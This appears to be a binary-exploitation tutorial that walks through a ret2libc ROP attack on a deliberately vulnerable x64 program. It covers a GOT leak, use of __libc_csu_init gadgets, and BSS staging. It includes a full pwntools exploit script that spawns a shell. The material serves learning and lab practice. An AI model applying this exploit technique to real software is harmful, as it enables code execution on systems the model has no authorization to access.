Intro

In the previous article, we covered parameter passing conventions for both x86 and x64 architectures, and performed a basic ROP attack on an x86 binary. This time, let’s take the plunge into x64 territory—performing a ret2libc attack using only libc functions, without any helper functions in the binary. This is the final exercise from the “Step by Step ROP” x64 series.

Source Code

#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
        write(STDOUT_FILENO, "Hello, World\n", 13);
        vulnerable_function();
}

The vulnerability in vulnerable_function is a plain stack buffer overflow: read() accepts up to 512 bytes into a 128-byte buffer. The saved return address sits 136 bytes from the start of buf (see the previous article for how to find the offset). Compilation flags:

$ gcc -fno-stack-protector -no-pie level5.c -o level5

Inspecting the binary confirms it links against libc:

➜  linux_x64 git:(master) ✗ checksec ./level5                
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x64/level5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
➜  linux_x64 git:(master) ✗ readelf -d ./level5 | grep Shared
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

Overview

Our strategy: call system("/bin/sh") or execve("/bin/sh") to spawn a shell. We need to find libc’s runtime base address and a “/bin/sh” string in memory. While we can’t directly obtain libc’s base, we can leak the runtime address of write() using the GOT (Global Offset Table). The function signature:

ssize_t write(int fd, const void *buf, size_t count);

We’ll make write() print the 8 bytes stored in its own GOT entry. Since write() has already been called once by main(), that entry holds write()’s resolved runtime address. Viewing the relocation table:

➜  linux_x64 git:(master) ✗ objdump -R level5

level5:     file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE 
0000000000403fe0 R_X86_64_GLOB_DAT  _ITM_deregisterTMCloneTable
0000000000403fe8 R_X86_64_GLOB_DAT  __libc_start_main@GLIBC_2.2.5
0000000000403ff0 R_X86_64_GLOB_DAT  __gmon_start__
0000000000403ff8 R_X86_64_GLOB_DAT  _ITM_registerTMCloneTable
0000000000404018 R_X86_64_JUMP_SLOT  write@GLIBC_2.2.5
0000000000404020 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5

Both write and read are in the GOT. For an excellent GOT/PLT primer, see this series.

Since we have libc’s binary, we know write()’s offset within it. Combining the runtime address and the offset gives us libc’s base, from which we can derive system() or execve().
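The arithmetic behind that step can be sketched in a few lines of plain Python. This is only an illustration: the helper names are made up, and the two offsets are not read from a libc file but derived from the addresses printed in the sample run further down, so they only apply to that particular libc build.

```python
import struct

def u64_le(data: bytes) -> int:
    """Decode 8 raw bytes as an unsigned little-endian 64-bit integer."""
    return struct.unpack("<Q", data)[0]

def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Runtime base = leaked runtime address minus the symbol's offset in libc."""
    return leaked_addr - symbol_offset

# Assumption: offsets inferred from the sample run in this article,
# not taken from any specific libc release.
WRITE_OFFSET = 0xED1E0
EXECVE_OFFSET = 0xC9660

# The 8 bytes write() would print from its own GOT entry (value from the sample run)
leak_bytes = struct.pack("<Q", 0x7F4FEF8D71E0)

write_runtime = u64_le(leak_bytes)
base = libc_base(write_runtime, WRITE_OFFSET)
execve_runtime = base + EXECVE_OFFSET

print(hex(base), hex(execve_runtime))
```

A quick sanity check on any computed base is that it should be page-aligned (its low 12 bits are zero); if it is not, the leak or the offset is probably wrong.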

Next, we need a “/bin/sh” string. We’ll use read() to write “/bin/sh\0” into the BSS segment (a writable memory section).

Finally, call execve(). (For reasons I never figured out, calling system() consistently failed in my environment—if anyone knows why, I’d love to hear!)

Payload

Since x64 uses registers for parameter passing, we can’t just push arguments onto the stack. We need ROP gadgets like pop rdi/rsi/rdx. Disassembling __libc_csu_init reveals two useful gadgets:

  • gadget_call: Moves r14→rdx, r13→rsi, r12d→edi, then calls [r15+rbx*8]
  4011d0:       4c 89 f2                mov    %r14,%rdx
  4011d3:       4c 89 ee                mov    %r13,%rsi
  4011d6:       44 89 e7                mov    %r12d,%edi
  4011d9:       41 ff 14 df             callq  *(%r15,%rbx,8)
  • gadget_pop: Pops stack values into registers
  4011ea:       5b                      pop    %rbx
  4011eb:       5d                      pop    %rbp
  4011ec:       41 5c                   pop    %r12
  4011ee:       41 5d                   pop    %r13
  4011f0:       41 5e                   pop    %r14
  4011f2:       41 5f                   pop    %r15
  4011f4:       c3                      retq  

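The popped values feed directly into the registers that gadget_call copies into the argument registers. Note that callq *(%r15,%rbx,8) is an indirect call: r15 must hold the address of a memory slot that contains the function pointer (such as a GOT entry), not the function address itself. Our ROP chain therefore sets rbx = 0, loads the slot address into r15, and places the three arguments in r12, r13, and r14. Because the gadget moves r12d into edi, only the low 32 bits of the first argument are passed, which is enough for a file descriptor or an address inside this non-PIE binary.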
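To make the register flow concrete, here is a small model of the two gadgets in plain Python. It is a sketch rather than an emulator: the function name and the dictionary standing in for memory are hypothetical, and the write() address is the one from the sample run later in this article.

```python
MASK32 = 0xFFFFFFFF

def run_csu_gadgets(stack_qwords, memory):
    """Model gadget_pop followed by gadget_call on a list of 64-bit stack values."""
    # gadget_pop: pop rbx, rbp, r12, r13, r14, r15 in that order
    names = ["rbx", "rbp", "r12", "r13", "r14", "r15"]
    regs = dict(zip(names, stack_qwords[:6]))

    # gadget_call: copy into the argument registers
    regs["rdx"] = regs["r14"]
    regs["rsi"] = regs["r13"]
    regs["rdi"] = regs["r12"] & MASK32  # mov %r12d,%edi keeps only the low 32 bits

    # callq *(%r15,%rbx,8): the target is read from memory, not taken from r15
    slot = regs["r15"] + regs["rbx"] * 8
    regs["call_target"] = memory[slot]
    return regs

WRITE_GOT = 0x404018                     # from the relocation table above
memory = {WRITE_GOT: 0x7F4FEF8D71E0}     # resolved write() address (sample run)

# Stack layout for write(1, write_GOT, 8): rbx, rbp, r12, r13, r14, r15
regs = run_csu_gadgets([0, 1, 1, WRITE_GOT, 8, WRITE_GOT], memory)
print({k: hex(v) for k, v in regs.items()})
```

The model shows why the GOT entry address goes into r15: the call dereferences that slot to find write() itself.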

Stack Balance

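After the function called by gadget_call returns, execution continues inside __libc_csu_init: rbx is incremented and compared against rbp, and the loop repeats if they differ. To fall through instead of looping, we pop rbx = 0 and rbp = 1, so that rbx + 1 equals rbp. The code then runs add rsp, 8 followed by the six pops of gadget_pop and a ret, consuming (1+6)×8 = 56 bytes of stack, so we need 56 bytes of padding before the next return address.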

Exploit

The complete attack chain:

  1. Leak write()’s runtime address: overflow → ret to gadget_pop → ret to gadget_call: write(stdout, write_GOT, 8) → ret to main()
  2. Write “/bin/sh” and execve() address to BSS: overflow → ret to gadget_pop → ret to gadget_call: read(stdin, bss, 16) → ret to main(). Send: p64(execve_addr) + "/bin/sh\0"
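  3. Call execve("/bin/sh", NULL, NULL): overflow → ret to gadget_pop → ret to gadget_call with r15 = bss, which calls through the pointer stored there: execve(bss+8, 0, 0). execve() does not return on success, so the final return address is never used.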
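The 16 bytes written to BSS in step 2 serve two purposes, which a short sketch makes explicit. The function name is hypothetical and the execve() address is the one from the sample run below; the BSS address itself is left symbolic because it depends on the binary.

```python
import struct

def bss_blob(execve_addr: int) -> bytes:
    """Build the 16 bytes that read() stores at the start of BSS."""
    pointer_slot = struct.pack("<Q", execve_addr)  # bss+0: slot that r15 will point to
    path = b"/bin/sh\x00"                          # bss+8: NUL-terminated argument string
    return pointer_slot + path

blob = bss_blob(0x7F4FEF8B3660)  # execve() address from the sample run

# Step 3 then uses: r15 = bss (function slot), r12 = bss + 8 (first argument)
FUNC_SLOT_OFFSET = 0
ARG_OFFSET = 8
print(len(blob), blob[ARG_OFFSET:])
```

Storing the pointer in writable memory is what lets the indirect call in gadget_call reach a function that has no GOT entry of its own.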

Exploit Script

from pwn import *

p = process("./level5")

elf = ELF('level5')
libc = elf.libc
bssAddr = elf.bss()
mainAddr = elf.symbols['main']

gadMovToReg = 0x4011d0
gadPopToReg = 0x4011ea
stackBalanceOffset = 56

writeGotAddr = elf.got['write']
readGotAddr = elf.got['read']

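def genPayload( arg1, funcAddr, rbx = 0, rbp = 1, arg2 = 0, ret = mainAddr, arg3 = 0):
    # funcAddr is the address of a slot holding the function pointer (e.g. a GOT entry),
    # because gadget_call performs an indirect call through [r15 + rbx*8]
    payload = b'A' * 136 + p64(gadPopToReg) + p64(rbx) + p64(rbp) + p64(arg1) + p64(arg2) + p64(arg3) + p64(funcAddr)
    # padding absorbs add rsp, 8 and the six pops that run after the call returns
    payload += p64(gadMovToReg) + b'A' * stackBalanceOffset + p64(ret)
    return payload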

p.recvuntil(b"Hello, World\n")

# Step 1: Leak write() address
payload1 = genPayload(1, writeGotAddr, arg2 = writeGotAddr, arg3 = 8)
p.send(payload1)
sleep(1)

# recvn() blocks until exactly 8 bytes (the GOT entry contents) have arrived
writeAddrInLibc = u64(p.recvn(8))
print("[*] Write Addr in libc:", hex(writeAddrInLibc))

libc.address = writeAddrInLibc - libc.symbols['write']
print("[*] libc Addr:", hex(libc.address))

execveAddr = libc.symbols['execve']
print("[*] execve Addr:", hex(execveAddr))

p.recvuntil(b"Hello, World\n")

# Step 2: Write execve address + "/bin/sh" to BSS
payload2 = genPayload(0, readGotAddr, arg2 = bssAddr, arg3 = 16)
p.send(payload2)
print("[*] Sent Payload2")
sleep(1)

# Send all 16 bytes in one write so a single read() receives them together
p.send(p64(execveAddr) + b"/bin/sh\0")
sleep(1)

p.recvuntil(b"Hello, World\n")

# Step 3: Call execve("/bin/sh")
payload3 = genPayload(bssAddr+8, bssAddr)
p.send(payload3)
print("[*] Sent Payload3")
sleep(1)
p.interactive()

Output:

➜  linux_x64 git:(master) ✗ python ./shellcode5.py
[+] Starting local process './level5': pid 11820
[*] Write Addr in libc: 0x7f4fef8d71e0
[*] libc Addr: 0x7f4fef7ea000
[*] execve Addr: 0x7f4fef8b3660
[*] Sent Payload2
[*] Sent Payload3
[*] Switching to interactive mode
$ whoami
ya0guang

Summary & Gadgets

If you’ve reproduced this successfully, congratulations—you’ve fallen into the binary exploitation rabbit hole, just like me. I was reading Reverse Engineering for Beginners (RE4B) at the time, which is an excellent assembly language reference if you want to go deeper.

One mystery I never solved: calling system() never returned a shell in my setup, while execve() worked perfectly. If anyone knows why, I’d appreciate the insight.

The same attack also consistently failed on my Ubuntu 18.04 physical machine. GDB debugging showed all addresses and arguments were correct, yet the shell never spawned. Quite frustrating—if you’ve encountered similar issues, please let me know.